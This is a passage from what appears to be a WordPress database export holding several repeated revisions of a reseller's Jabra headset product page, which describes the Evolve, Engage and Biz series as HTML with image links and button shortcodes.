noise. Superior Active and Passive Noise Cancellation provide crystal-clear calls. All-day comfort, an integrated busylight, and certified for Skype for Business, Cisco, and more.</p><p style=\"text-align: center;\"><strong>[maxbutton id=\"14\"]</strong></p><h2 style=\"text-align: center;\"><strong>Jabra Evolve 75e</strong></h2><p>Engineered for professional sound in comfortable, wireless earbuds, Evolve 75e is for those who need Skype for Business and Active Noise Cancellation â€“ but in an around-the-neck design. A host of professional features found in the Jabra Evolve Series, combined with up to 14 hours of battery for calls and music.</p><p style=\"text-align: center;\"><strong>[maxbutton id=\"14\"]</strong></p><p><img src=\"https://bintara.com.my/wp-content/uploads/2019/02/Jabra_Evolve75e.png\" alt=\"\" width=\"205\" height=\"205\" /></p><p><img src=\"https://bintara.com.my/wp-content/uploads/2019/02/954a74d741e4aeb8f7a9bd04d9dd2b0643c89424_00_Evolve_75.png\" alt=\"\" width=\"201\" height=\"201\" /></p><h2 style=\"text-align: center;\"><strong>Jabra Evolve 75</strong></h2><p>Engineered for concentration in the office, Evolve 75 is a wireless premium headset for professionals who want to avoid disruptive noise â€“ and need mobility around the workspace. Move up to 100ft/30m away from your connected device, all-day comfort, an integrated busylight, and certified for Skype for Business, Cisco, and more.</p><p style=\"text-align: center;\"><strong>[maxbutton id=\"14\"]</strong></p><h2 style=\"text-align: center;\"><strong>Jabra Evolve 65 Stereo / Mono</strong></h2><p>Engineered to multi-task, Evolve 65 is a wireless headset ideal for professionals who move around the office, but need to avoid interruptions. Connects to two Bluetooth products, includes an integrated busylight, and is certified for Skype for Business, Cisco, and more.</p><p style=\"text-align: center;\"><strong>[maxbutton id=\"14\"]</strong></p><p><img src=\"https://bintara.com.my/wp-content/uploads/2019/02/Evolve_65.png\" alt=\"\" width=\"203\" height=\"203\" /></p><p><img src=\"https://bintara.com.my/wp-content/uploads/2019/02/752b1c6ecb4d653451bc19b4b566a870ae6bd94f_00_Evolve_40.png\" alt=\"\" width=\"209\" height=\"209\" /></p><h2 style=\"text-align: center;\"><strong>Jabra Evolve 40 Stereo / Mono</strong></h2><p>Engineered to boost productivity, Evolve 40 is a corded headset for professionals who take calls at the desk and need to avoid interruptions. Connects using USB or jack, includes an integrated busylight, and is certified for Skype for Business, Cisco, and more.</p><p style=\"text-align: center;\"><strong>[maxbutton id=\"14\"]</strong></p><h2 style=\"text-align: center;\"><strong>Jabra Evolve 30 Stereo / Mono</strong></h2><p>Engineered for flexible connectivity, Evolve 30 is a corded headset for professionals who want simple and fast Plug and Play connection to USB or jack. Features a control unit for easy call management, and is certified for Skype for Business, Cisco, and more. Comes with leather-feel ear cushions and on-the-ear design for all-day use.</p><p style=\"text-align: center;\"><strong>[maxbutton id=\"14\"]</strong></p><p><img src=\"https://bintara.com.my/wp-content/uploads/2019/02/Evolve_20.png\" alt=\"\" width=\"200\" height=\"200\" /></p><p><img src=\"https://bintara.com.my/wp-content/uploads/2019/02/Evolve_20.png\" alt=\"\" width=\"216\" height=\"216\" /></p><h2 style=\"text-align: center;\"><strong>Jabra Evolve 20 Stereo / Mono</strong></h2><p>Engineered for easy call management, Evolve 20 is an entry-level corded headset for professionals who need great sound for calls and music. A control unit lets you make, take and mute calls, and simple connection makes it easy to get started with your PC. Comes with foam ear cushions and on-the-ear design for all-day use.</p><p style=\"text-align: center;\"><strong>[maxbutton id=\"14\"]</strong></p><h2 style=\"text-align: center;\"><strong>Jabra Evolve 20 SE</strong></h2><p>Engineered for easy call management, Evolve 20 is an entry-level corded headset for professionals who need great sound for calls and music. A control unit lets you make, take and mute calls, and simple connection makes it easy to get started with your PC. Comes with foam ear cushions and on-the-ear design for all-day use.</p><p style=\"text-align: center;\"><strong>[maxbutton id=\"14\"]</strong></p><p><img src=\"https://bintara.com.my/wp-content/uploads/2019/02/Evolve_20_SE_Mono.png\" alt=\"\" width=\"204\" height=\"204\" /></p><p><img src=\"https://bintara.com.my/wp-content/uploads/2019/02/Engage_50_3.png\" alt=\"\" width=\"219\" height=\"249\" /></p><h2 style=\"text-align: center;\"><strong>Jabra Engage 50</strong></h2><p>Is your contact center moving, or considering moving, to softphones? Are you investing in contact center platform â€“ whether on-premise or cloud-based? The Jabra Engage 50 is the ideal digital headset to power your customer satisfaction.</p><p>The Jabra Engage 50 features a powerful processing chip in the earcup that delivers advanced functionality including call analytic data.</p><p style=\"text-align: center;\">[maxbutton id=\"14\" ]</p>		\n		<h2><strong>Jabra Biz Wired Series</strong></h2><h3>The Jabra Biz has an extremely lightweight and unobtrusive design.</h3><h2 style=\"text-align: center;\"><strong>Jabra Biz 2400 II</strong></h2><p>A wired professional headset that delivers outstanding sound on both ends of the call. 40% lighter than competing headsets, with super-soft leatherette headband and ear cushions. Built to last with a reinforced cord and unbreakable boom arm.</p><p style=\"text-align: center;\">[maxbutton id=\"14\" ]</p><p><img src=\"https://bintara.com.my/wp-content/uploads/2019/02/Biz_2400_II.png\" alt=\"\" width=\"179\" height=\"179\" /></p><p><img src=\"https://bintara.com.my/wp-content/uploads/2019/02/jabra_biz_2400_ii_mono_3-in-1.jpg\" alt=\"\" width=\"195\" height=\"195\" /></p><h2 style=\"text-align: center;\">Jabra BIZ 2400 II Mono 3-in-1</h2><p>A wired professional headset that delivers outstanding sound on both ends of the call. 40% lighter than competing headsets, with super-soft leatherette headband and ear cushions. Built to last with a reinforced cord and unbreakable boom arm.</p><p style=\"text-align: center;\">[maxbutton id=\"14\" ]</p><h2 style=\"text-align: center;\"><strong>Jabra Biz 2400 II DUO</strong></h2><p>A wired professional headset that delivers outstanding sound on both ends of the call. 40% lighter than competing headsets, with super-soft leatherette headband and ear cushions. Built to last with a reinforced cord and unbreakable boom arm.</p><p style=\"text-align: center;\">[maxbutton id=\"14\" ]</p><p><img src=\"https://bintara.com.my/wp-content/uploads/2019/02/Biz_2400_II.png\" alt=\"\" width=\"188\" height=\"188\" /></p>https://youtu.be/85RJqPjfjng		\n		<p><img src=\"https://bintara.com.my/wp-content/uploads/2019/02/Jabra_Biz_2300_QD_Duo.png\" alt=\"\" width=\"197\" height=\"197\" /></p><h2 style=\"text-align: center;\"><strong>Jabra Biz 2300</strong></h2><p>Built to survive in a high-performing contact centre, meaning fewer headset replacements and less downtime for you and your team and lower total cost of ownership.</p><p style=\"text-align: center;\">[maxbutton id=\"14\" ]</p><h2 style=\"text-align: center;\"><strong>Jabra Biz 2300 QD</strong></h2><p>Jabra Bizâ„¢ 2300 QD Mono is a mono headset with QD (Quick Disconnect) plug that provides instant connectivity to a wide range of desk phone systems.</p><p style=\"text-align: center;\">[maxbutton id=\"14\" ]</p><p><img src=\"https://bintara.com.my/wp-content/uploads/2019/02/Jabra_Biz_2300_QD.png\" alt=\"\" width=\"186\" height=\"186\" /></p><p><img src=\"https://bintara.com.my/wp-content/uploads/2019/02/Jabra_Biz_2300_QD_Duo.png\" alt=\"\" width=\"188\" height=\"188\" /></p><h2 style=\"text-align: center;\"><strong>Jabra Biz 2300 QD DUO</strong></h2><p>Jabra Bizâ„¢ 2300 QD Duo is a duo headset with QD (Quick Disconnect) plug that provides instant connectivity to a wide range of desk phone systems.</p><p style=\"text-align: center;\">[maxbutton id=\"14\" ]</p><h2 style=\"text-align: center;\"><strong>Jabra Biz 1500</strong></h2><p>The Jabra BIZ 1500 is an entry level, low cost professional corded headset built for cost conscious contact centers. With noise cancellation technology, background noise is reduced providing a more professional customer experience on every call.</p><p style=\"text-align: center;\">[maxbutton id=\"14\" ]</p><p><img src=\"https://bintara.com.my/wp-content/uploads/2019/02/Jabra_Biz_1500_DUO_QD.png\" alt=\"\" width=\"197\" height=\"197\" /></p><p style=\"text-align: center;\"><img src=\"https://bintara.com.my/wp-content/uploads/2019/02/Jabra_Biz_1500_DUO_USB.png\" alt=\"\" width=\"190\" height=\"190\" /></p><h2 style=\"text-align: center;\"><strong>Jabra Biz 1500 DUO USB</strong></h2><p>Cost Efficient Professional Corded Headset for Softphone.A duo headset that provides USB connectivity to laptops for softphone use. Comes with a control unit for easy control of volume and mute when on a call.</p><p style=\"text-align: center;\">[maxbutton id=\"14\" ]</p><p style=\"text-align: center;\">[maxbutton id=\"1\" ]</p>','Jabra','','inherit','closed','closed','','1532-revision-v1','','','2019-10-03 15:39:54','2019-10-03 07:39:54','',1532,'https://bintara.com.my/blog/2019/10/03/1532-revision-v1/',0,'revision','',0),(3649,1,'2019-10-03 15:35:14','2019-10-03 07:35:14','<h1 style=\"text-align: center;\"><strong>Jabra</strong></h1><h3 style=\"text-align: center;\">Sound thatâ€™s engineered for you</h3><p>We engineer true wireless earbuds offering you total freedom noise-cancelling headsets allowing you to block out unwanted background sound; high definition headsets letting those youâ€™re speaking to hear you with crystal-clear clarity and state-of-the-art fitness tracking sports headphones that aid you in beating your personal best. Each product helps you hear more, do more, and be more.</p><p>With Jabra, you know that you are getting the best products on the market. They are engineered to be so.</p><h2>Jabra Evolve Series</h2><h3>Engineered to be the best professional headsets to enhance productivity in the open office</h3>		\n										<img width=\"300\" height=\"300\" src=\"https://bintara.com.my/wp-content/uploads/2019/02/Evolve-300x300.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2019/02/Evolve-300x300.jpg 300w, https://bintara.com.my/wp-content/uploads/2019/02/Evolve-150x150.jpg 150w, https://bintara.com.my/wp-content/uploads/2019/02/Evolve-20x20.jpg 20w, https://bintara.com.my/wp-content/uploads/2019/02/Evolve.jpg 585w\" sizes=\"(max-width: 300px) 100vw, 300px\" />											\n		<h3>Better concentration, greater productivity</h3><p>The Jabra Evolve Series is a professional range of headsets offering best-in-class noise cancellation to aid concentration in open office environments.</p><ul><li>World-class speakers to deliver amazing sound for calls and music.</li><li>Call-management features allow for incredible ease-of-use..</li><li>Compatible with all leading UC platforms.</li></ul>		\n		<h2 style=\"text-align: center;\"><strong>Jabra Evolve 65t</strong></h2><p>The Jabra Evolve 65t are the worldâ€™s first UC-certified, true wireless earbuds. Features include Bluetooth 5.0, Passive Noise Cancellation, long battery life (up to 15 hours), and multiple EarGelsâ„¢ for a personalized, secure fit. Enjoy crystal-clear sound quality and rock-solid call and music connection.</p><p style=\"text-align: center;\"><strong>[maxbutton id=\"14\"]</strong></p><p><img src=\"https://bintara.com.my/wp-content/uploads/2019/02/JabraEvolve65t_ProductImage.png\" alt=\"\" width=\"163\" height=\"163\" /></p><h2 style=\"text-align: center;\"><strong>Jabra Evolve 65t</strong></h2><p>The Jabra Evolve 65t are the worldâ€™s first UC-certified, true wireless earbuds. Features include Bluetooth 5.0, Passive Noise Cancellation, long battery life (up to 15 hours), and multiple EarGelsâ„¢ for a personalized, secure fit. Enjoy crystal-clear sound quality and rock-solid call and music connection.</p><p style=\"text-align: center;\"><strong>[maxbutton id=\"14\"]</strong></p><p><img src=\"https://bintara.com.my/wp-content/uploads/2019/02/JabraEvolve65t_ProductImage.png\" alt=\"\" width=\"163\" height=\"163\" /></p><p><img src=\"https://bintara.com.my/wp-content/uploads/2019/02/Evolve_80.png\" alt=\"\" width=\"203\" height=\"203\" /></p><h2 style=\"text-align: center;\"><strong>Jabra Evolve 80</strong></h2><p>Engineered for concentration, Evolve 80 is a corded premium headset for professionals who need to avoid disruptive noise. Superior Active and Passive Noise Cancellation provide crystal-clear calls. All-day comfort, an integrated busylight, and certified for Skype for Business, Cisco, and more.</p><p style=\"text-align: center;\"><strong>[maxbutton id=\"14\"]</strong></p><h2 style=\"text-align: center;\"><strong>Jabra Evolve 75e</strong></h2><p>Engineered for professional sound in comfortable, wireless earbuds, Evolve 75e is for those who need Skype for Business and Active Noise Cancellation â€“ but in an around-the-neck design. A host of professional features found in the Jabra Evolve Series, combined with up to 14 hours of battery for calls and music.</p><p style=\"text-align: center;\"><strong>[maxbutton id=\"14\"]</strong></p><p><img src=\"https://bintara.com.my/wp-content/uploads/2019/02/Jabra_Evolve75e.png\" alt=\"\" width=\"205\" height=\"205\" /></p><p><img src=\"https://bintara.com.my/wp-content/uploads/2019/02/954a74d741e4aeb8f7a9bd04d9dd2b0643c89424_00_Evolve_75.png\" alt=\"\" width=\"201\" height=\"201\" /></p><h2 style=\"text-align: center;\"><strong>Jabra Evolve 75</strong></h2><p>Engineered for concentration in the office, Evolve 75 is a wireless premium headset for professionals who want to avoid disruptive noise â€“ and need mobility around the workspace. Move up to 100ft/30m away from your connected device, all-day comfort, an integrated busylight, and certified for Skype for Business, Cisco, and more.</p><p style=\"text-align: center;\"><strong>[maxbutton id=\"14\"]</strong></p><h2 style=\"text-align: center;\"><strong>Jabra Evolve 65 Stereo / Mono</strong></h2><p>Engineered to multi-task, Evolve 65 is a wireless headset ideal for professionals who move around the office, but need to avoid interruptions. Connects to two Bluetooth products, includes an integrated busylight, and is certified for Skype for Business, Cisco, and more.</p><p style=\"text-align: center;\"><strong>[maxbutton id=\"14\"]</strong></p><p><img src=\"https://bintara.com.my/wp-content/uploads/2019/02/Evolve_65.png\" alt=\"\" width=\"203\" height=\"203\" /></p><p><img src=\"https://bintara.com.my/wp-content/uploads/2019/02/752b1c6ecb4d653451bc19b4b566a870ae6bd94f_00_Evolve_40.png\" alt=\"\" width=\"209\" height=\"209\" /></p><h2 style=\"text-align: center;\"><strong>Jabra Evolve 40 Stereo / Mono</strong></h2><p>Engineered to boost productivity, Evolve 40 is a corded headset for professionals who take calls at the desk and need to avoid interruptions. Connects using USB or jack, includes an integrated busylight, and is certified for Skype for Business, Cisco, and more.</p><p style=\"text-align: center;\"><strong>[maxbutton id=\"14\"]</strong></p><h2 style=\"text-align: center;\"><strong>Jabra Evolve 30 Stereo / Mono</strong></h2><p>Engineered for flexible connectivity, Evolve 30 is a corded headset for professionals who want simple and fast Plug and Play connection to USB or jack. Features a control unit for easy call management, and is certified for Skype for Business, Cisco, and more. Comes with leather-feel ear cushions and on-the-ear design for all-day use.</p><p style=\"text-align: center;\"><strong>[maxbutton id=\"14\"]</strong></p><p><img src=\"https://bintara.com.my/wp-content/uploads/2019/02/Evolve_20.png\" alt=\"\" width=\"200\" height=\"200\" /></p><p><img src=\"https://bintara.com.my/wp-content/uploads/2019/02/Evolve_20.png\" alt=\"\" width=\"216\" height=\"216\" /></p><h2 style=\"text-align: center;\"><strong>Jabra Evolve 20 Stereo / Mono</strong></h2><p>Engineered for easy call management, Evolve 20 is an entry-level corded headset for professionals who need great sound for calls and music. A control unit lets you make, take and mute calls, and simple connection makes it easy to get started with your PC. Comes with foam ear cushions and on-the-ear design for all-day use.</p><p style=\"text-align: center;\"><strong>[maxbutton id=\"14\"]</strong></p><h2 style=\"text-align: center;\"><strong>Jabra Evolve 20 SE</strong></h2><p>Engineered for easy call management, Evolve 20 is an entry-level corded headset for professionals who need great sound for calls and music. A control unit lets you make, take and mute calls, and simple connection makes it easy to get started with your PC. Comes with foam ear cushions and on-the-ear design for all-day use.</p><p style=\"text-align: center;\"><strong>[maxbutton id=\"14\"]</strong></p><p><img src=\"https://bintara.com.my/wp-content/uploads/2019/02/Evolve_20_SE_Mono.png\" alt=\"\" width=\"204\" height=\"204\" /></p><p><img src=\"https://bintara.com.my/wp-content/uploads/2019/02/Engage_50_3.png\" alt=\"\" width=\"219\" height=\"249\" /></p><h2 style=\"text-align: center;\"><strong>Jabra Engage 50</strong></h2><p>Is your contact center moving, or considering moving, to softphones? Are you investing in contact center platform â€“ whether on-premise or cloud-based? The Jabra Engage 50 is the ideal digital headset to power your customer satisfaction.</p><p>The Jabra Engage 50 features a powerful processing chip in the earcup that delivers advanced functionality including call analytic data.</p><p style=\"text-align: center;\">[maxbutton id=\"14\" ]</p>		\n		<h2><strong>Jabra Biz Wired Series</strong></h2><h3>The Jabra Biz has an extremely lightweight and unobtrusive design.</h3><h2 style=\"text-align: center;\"><strong>Jabra Biz 2400 II</strong></h2><p>A wired professional headset that delivers outstanding sound on both ends of the call. 40% lighter than competing headsets, with super-soft leatherette headband and ear cushions. Built to last with a reinforced cord and unbreakable boom arm.</p><p style=\"text-align: center;\">[maxbutton id=\"14\" ]</p><p><img src=\"https://bintara.com.my/wp-content/uploads/2019/02/Biz_2400_II.png\" alt=\"\" width=\"179\" height=\"179\" /></p><p><img src=\"https://bintara.com.my/wp-content/uploads/2019/02/jabra_biz_2400_ii_mono_3-in-1.jpg\" alt=\"\" width=\"195\" height=\"195\" /></p><h2 style=\"text-align: center;\">Jabra BIZ 2400 II Mono 3-in-1</h2><p>A wired professional headset that delivers outstanding sound on both ends of the call. 40% lighter than competing headsets, with super-soft leatherette headband and ear cushions. Built to last with a reinforced cord and unbreakable boom arm.</p><p style=\"text-align: center;\">[maxbutton id=\"14\" ]</p><h2 style=\"text-align: center;\"><strong>Jabra Biz 2400 II DUO</strong></h2><p>A wired professional headset that delivers outstanding sound on both ends of the call. 40% lighter than competing headsets, with super-soft leatherette headband and ear cushions. Built to last with a reinforced cord and unbreakable boom arm.</p><p style=\"text-align: center;\">[maxbutton id=\"14\" ]</p><p><img src=\"https://bintara.com.my/wp-content/uploads/2019/02/Biz_2400_II.png\" alt=\"\" width=\"188\" height=\"188\" /></p>https://youtu.be/85RJqPjfjng		\n		<p><img src=\"https://bintara.com.my/wp-content/uploads/2019/02/Jabra_Biz_2300_QD_Duo.png\" alt=\"\" width=\"197\" height=\"197\" /></p><h2 style=\"text-align: center;\"><strong>Jabra Biz 2300</strong></h2><p>Built to survive in a high-performing contact centre, meaning fewer headset replacements and less downtime for you and your team and lower total cost of ownership.</p><p style=\"text-align: center;\">[maxbutton id=\"14\" ]</p><h2 style=\"text-align: center;\"><strong>Jabra Biz 2300 QD</strong></h2><p>Jabra Bizâ„¢ 2300 QD Mono is a mono headset with QD (Quick Disconnect) plug that provides instant connectivity to a wide range of desk phone systems.</p><p style=\"text-align: center;\">[maxbutton id=\"14\" ]</p><p><img src=\"https://bintara.com.my/wp-content/uploads/2019/02/Jabra_Biz_2300_QD.png\" alt=\"\" width=\"186\" height=\"186\" /></p><p><img src=\"https://bintara.com.my/wp-content/uploads/2019/02/Jabra_Biz_2300_QD_Duo.png\" alt=\"\" width=\"188\" height=\"188\" /></p><h2 style=\"text-align: center;\"><strong>Jabra Biz 2300 QD DUO</strong></h2><p>Jabra Bizâ„¢ 2300 QD Duo is a duo headset with QD (Quick Disconnect) plug that provides instant connectivity to a wide range of desk phone systems.</p><p style=\"text-align: center;\">[maxbutton id=\"14\" ]</p><h2 style=\"text-align: center;\"><strong>Jabra Biz 1500</strong></h2><p>The Jabra BIZ 1500 is an entry level, low cost professional corded headset built for cost conscious contact centers. With noise cancellation technology, background noise is reduced providing a more professional customer experience on every call.</p><p style=\"text-align: center;\">[maxbutton id=\"14\" ]</p><p><img src=\"https://bintara.com.my/wp-content/uploads/2019/02/Jabra_Biz_1500_DUO_QD.png\" alt=\"\" width=\"197\" height=\"197\" /></p><p style=\"text-align: center;\"><img src=\"https://bintara.com.my/wp-content/uploads/2019/02/Jabra_Biz_1500_DUO_USB.png\" alt=\"\" width=\"190\" height=\"190\" /></p><h2 style=\"text-align: center;\"><strong>Jabra Biz 1500 DUO USB</strong></h2><p>Cost Efficient Professional Corded Headset for Softphone.A duo headset that provides USB connectivity to laptops for softphone use. Comes with a control unit for easy control of volume and mute when on a call.</p><p style=\"text-align: center;\">[maxbutton id=\"14\" ]</p><p style=\"text-align: center;\">[maxbutton id=\"1\" ]</p>','Jabra','','inherit','closed','closed','','1532-revision-v1','','','2019-10-03 15:35:14','2019-10-03 07:35:14','',1532,'https://bintara.com.my/blog/2019/10/03/1532-revision-v1/',0,'revision','',0),(3651,1,'2019-10-03 15:42:00','2019-10-03 07:42:00','<h1 style=\"text-align: center;\"><strong>Jabra</strong></h1><h3 style=\"text-align: center;\">Sound thatâ€™s engineered for you</h3><p>We engineer true wireless earbuds offering you total freedom noise-cancelling headsets allowing you to block out unwanted background sound; high definition headsets letting those youâ€™re speaking to hear you with crystal-clear clarity and state-of-the-art fitness tracking sports headphones that aid you in beating your personal best. Each product helps you hear more, do more, and be more.</p><p>With Jabra, you know that you are getting the best products on the market. They are engineered to be so.</p><h2>Jabra Evolve Series</h2><h3>Engineered to be the best professional headsets to enhance productivity in the open office</h3>		\n										<img width=\"300\" height=\"300\" src=\"https://bintara.com.my/wp-content/uploads/2019/02/Evolve-300x300.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2019/02/Evolve-300x300.jpg 300w, https://bintara.com.my/wp-content/uploads/2019/02/Evolve-150x150.jpg 150w, https://bintara.com.my/wp-content/uploads/2019/02/Evolve-20x20.jpg 20w, https://bintara.com.my/wp-content/uploads/2019/02/Evolve.jpg 585w\" sizes=\"(max-width: 300px) 100vw, 300px\" />											\n		<h3>Better concentration, greater productivity</h3><p>The Jabra Evolve Series is a professional range of headsets offering best-in-class noise cancellation to aid concentration in open office environments.</p><ul><li>World-class speakers to deliver amazing sound for calls and music.</li><li>Call-management features allow for incredible ease-of-use..</li><li>Compatible with all leading UC platforms.</li></ul>		\n		<h2 style=\"text-align: center;\"><strong>Jabra Evolve 65t</strong></h2><p>The Jabra Evolve 65t are the worldâ€™s first UC-certified, true wireless earbuds. Features include Bluetooth 5.0, Passive Noise Cancellation, long battery life (up to 15 hours), and multiple EarGelsâ„¢ for a personalized, secure fit. Enjoy crystal-clear sound quality and rock-solid call and music connection.</p><p style=\"text-align: center;\"><strong>[maxbutton id=\"14\"]</strong></p><p><img src=\"https://bintara.com.my/wp-content/uploads/2019/02/JabraEvolve65t_ProductImage.png\" alt=\"\" width=\"163\" height=\"163\" /></p><p><img src=\"https://bintara.com.my/wp-content/uploads/2019/02/Evolve_80.png\" alt=\"\" width=\"203\" height=\"203\" /></p><h2 style=\"text-align: center;\"><strong>Jabra Evolve 80</strong></h2><p>Engineered for concentration, Evolve 80 is a corded premium headset for professionals who need to avoid disruptive noise. Superior Active and Passive Noise Cancellation provide crystal-clear calls. All-day comfort, an integrated busylight, and certified for Skype for Business, Cisco, and more.</p><p style=\"text-align: center;\"><strong>[maxbutton id=\"14\"]</strong></p><h2 style=\"text-align: center;\"><strong>Jabra Evolve 75e</strong></h2><p>Engineered for professional sound in comfortable, wireless earbuds, Evolve 75e is for those who need Skype for Business and Active Noise Cancellation â€“ but in an around-the-neck design. A host of professional features found in the Jabra Evolve Series, combined with up to 14 hours of battery for calls and music.</p><p style=\"text-align: center;\"><strong>[maxbutton id=\"14\"]</strong></p><p><img src=\"https://bintara.com.my/wp-content/uploads/2019/02/Jabra_Evolve75e.png\" alt=\"\" width=\"205\" height=\"205\" /></p><p><img src=\"https://bintara.com.my/wp-content/uploads/2019/02/954a74d741e4aeb8f7a9bd04d9dd2b0643c89424_00_Evolve_75.png\" alt=\"\" width=\"201\" height=\"201\" /></p><h2 style=\"text-align: center;\"><strong>Jabra Evolve 75</strong></h2><p>Engineered for concentration in the office, Evolve 75 is a wireless premium headset for professionals who want to avoid disruptive noise â€“ and need mobility around the workspace. Move up to 100ft/30m away from your connected device, all-day comfort, an integrated busylight, and certified for Skype for Business, Cisco, and more.</p><p style=\"text-align: center;\"><strong>[maxbutton id=\"14\"]</strong></p><h2 style=\"text-align: center;\"><strong>Jabra Evolve 65 Stereo / Mono</strong></h2><p>Engineered to multi-task, Evolve 65 is a wireless headset ideal for professionals who move around the office, but need to avoid interruptions. Connects to two Bluetooth products, includes an integrated busylight, and is certified for Skype for Business, Cisco, and more.</p><p style=\"text-align: center;\"><strong>[maxbutton id=\"14\"]</strong></p><p><img src=\"https://bintara.com.my/wp-content/uploads/2019/02/Evolve_65.png\" alt=\"\" width=\"203\" height=\"203\" /></p><p><img src=\"https://bintara.com.my/wp-content/uploads/2019/02/752b1c6ecb4d653451bc19b4b566a870ae6bd94f_00_Evolve_40.png\" alt=\"\" width=\"209\" height=\"209\" /></p><h2 style=\"text-align: center;\"><strong>Jabra Evolve 40 Stereo / Mono</strong></h2><p>Engineered to boost productivity, Evolve 40 is a corded headset for professionals who take calls at the desk and need to avoid interruptions. Connects using USB or jack, includes an integrated busylight, and is certified for Skype for Business, Cisco, and more.</p><p style=\"text-align: center;\"><strong>[maxbutton id=\"14\"]</strong></p><h2 style=\"text-align: center;\"><strong>Jabra Evolve 30 Stereo / Mono</strong></h2><p>Engineered for flexible connectivity, Evolve 30 is a corded headset for professionals who want simple and fast Plug and Play connection to USB or jack. Features a control unit for easy call management, and is certified for Skype for Business, Cisco, and more. Comes with leather-feel ear cushions and on-the-ear design for all-day use.</p><p style=\"text-align: center;\"><strong>[maxbutton id=\"14\"]</strong></p><p><img src=\"https://bintara.com.my/wp-content/uploads/2019/02/Evolve_20.png\" alt=\"\" width=\"200\" height=\"200\" /></p><p><img src=\"https://bintara.com.my/wp-content/uploads/2019/02/Evolve_20.png\" alt=\"\" width=\"216\" height=\"216\" /></p><h2 style=\"text-align: center;\"><strong>Jabra Evolve 20 Stereo / Mono</strong></h2><p>Engineered for easy call management, Evolve 20 is an entry-level corded headset for professionals who need great sound for calls and music. A control unit lets you make, take and mute calls, and simple connection makes it easy to get started with your PC. Comes with foam ear cushions and on-the-ear design for all-day use.</p><p style=\"text-align: center;\"><strong>[maxbutton id=\"14\"]</strong></p><h2 style=\"text-align: center;\"><strong>Jabra Evolve 20 SE</strong></h2><p>Engineered for easy call management, Evolve 20 is an entry-level corded headset for professionals who need great sound for calls and music. A control unit lets you make, take and mute calls, and simple connection makes it easy to get started with your PC. Comes with foam ear cushions and on-the-ear design for all-day use.</p><p style=\"text-align: center;\"><strong>[maxbutton id=\"14\"]</strong></p><p><img src=\"https://bintara.com.my/wp-content/uploads/2019/02/Evolve_20_SE_Mono.png\" alt=\"\" width=\"204\" height=\"204\" /></p><p><img src=\"https://bintara.com.my/wp-content/uploads/2019/02/Engage_50_3.png\" alt=\"\" width=\"219\" height=\"249\" /></p><h2 style=\"text-align: center;\"><strong>Jabra Engage 50</strong></h2><p>Is your contact center moving, or considering moving, to softphones? Are you investing in contact center platform â€“ whether on-premise or cloud-based? The Jabra Engage 50 is the ideal digital headset to power your customer satisfaction.</p><p>The Jabra Engage 50 features a powerful processing chip in the earcup that delivers advanced functionality including call analytic data.</p><p style=\"text-align: center;\">[maxbutton id=\"14\" ]</p>		\n		<h2><strong>Jabra Biz Wired Series</strong></h2><h3>The Jabra Biz has an extremely lightweight and unobtrusive design.</h3><h2 style=\"text-align: center;\"><strong>Jabra Biz 2400 II</strong></h2><p>A wired professional headset that delivers outstanding sound on both ends of the call. 40% lighter than competing headsets, with super-soft leatherette headband and ear cushions. Built to last with a reinforced cord and unbreakable boom arm.</p><p style=\"text-align: center;\">[maxbutton id=\"14\" ]</p><p><img src=\"https://bintara.com.my/wp-content/uploads/2019/02/Biz_2400_II.png\" alt=\"\" width=\"179\" height=\"179\" /></p><p><img src=\"https://bintara.com.my/wp-content/uploads/2019/02/jabra_biz_2400_ii_mono_3-in-1.jpg\" alt=\"\" width=\"195\" height=\"195\" /></p><h2 style=\"text-align: center;\">Jabra BIZ 2400 II Mono 3-in-1</h2><p>A wired professional headset that delivers outstanding sound on both ends of the call. 40% lighter than competing headsets, with super-soft leatherette headband and ear cushions. Built to last with a reinforced cord and unbreakable boom arm.</p><p style=\"text-align: center;\">[maxbutton id=\"14\" ]</p><h2 style=\"text-align: center;\"><strong>Jabra Biz 2400 II DUO</strong></h2><p>A wired professional headset that delivers outstanding sound on both ends of the call. 40% lighter than competing headsets, with super-soft leatherette headband and ear cushions. Built to last with a reinforced cord and unbreakable boom arm.</p><p style=\"text-align: center;\">[maxbutton id=\"14\" ]</p><p><img src=\"https://bintara.com.my/wp-content/uploads/2019/02/Biz_2400_II.png\" alt=\"\" width=\"188\" height=\"188\" /></p>https://youtu.be/85RJqPjfjng		\n		<p><img src=\"https://bintara.com.my/wp-content/uploads/2019/02/Jabra_Biz_2300_QD_Duo.png\" alt=\"\" width=\"197\" height=\"197\" /></p><h2 style=\"text-align: center;\"><strong>Jabra Biz 2300</strong></h2><p>Built to survive in a high-performing contact centre, meaning fewer headset replacements and less downtime for you and your team and lower total cost of ownership.</p><p style=\"text-align: center;\">[maxbutton id=\"14\" ]</p><h2 style=\"text-align: center;\"><strong>Jabra Biz 2300 QD</strong></h2><p>Jabra Bizâ„¢ 2300 QD Mono is a mono headset with QD (Quick Disconnect) plug that provides instant connectivity to a wide range of desk phone systems.</p><p style=\"text-align: center;\">[maxbutton id=\"14\" ]</p><p><img src=\"https://bintara.com.my/wp-content/uploads/2019/02/Jabra_Biz_2300_QD.png\" alt=\"\" width=\"186\" height=\"186\" /></p><p><img src=\"https://bintara.com.my/wp-content/uploads/2019/02/Jabra_Biz_2300_QD_Duo.png\" alt=\"\" width=\"188\" height=\"188\" /></p><h2 style=\"text-align: center;\"><strong>Jabra Biz 2300 QD DUO</strong></h2><p>Jabra Bizâ„¢ 2300 QD Duo is a duo headset with QD (Quick Disconnect) plug that provides instant connectivity to a wide range of desk phone systems.</p><p style=\"text-align: center;\">[maxbutton id=\"14\" ]</p><h2 style=\"text-align: center;\"><strong>Jabra Biz 1500</strong></h2><p>The Jabra BIZ 1500 is an entry level, low cost professional corded headset built for cost conscious contact centers. With noise cancellation technology, background noise is reduced providing a more professional customer experience on every call.</p><p style=\"text-align: center;\">[maxbutton id=\"14\" ]</p><p><img src=\"https://bintara.com.my/wp-content/uploads/2019/02/Jabra_Biz_1500_DUO_QD.png\" alt=\"\" width=\"197\" height=\"197\" /></p><p style=\"text-align: center;\"><img src=\"https://bintara.com.my/wp-content/uploads/2019/02/Jabra_Biz_1500_DUO_USB.png\" alt=\"\" width=\"190\" height=\"190\" /></p><h2 style=\"text-align: center;\"><strong>Jabra Biz 1500 DUO USB</strong></h2><p>Cost Efficient Professional Corded Headset for Softphone.A duo headset that provides USB connectivity to laptops for softphone use. Comes with a control unit for easy control of volume and mute when on a call.</p><p style=\"text-align: 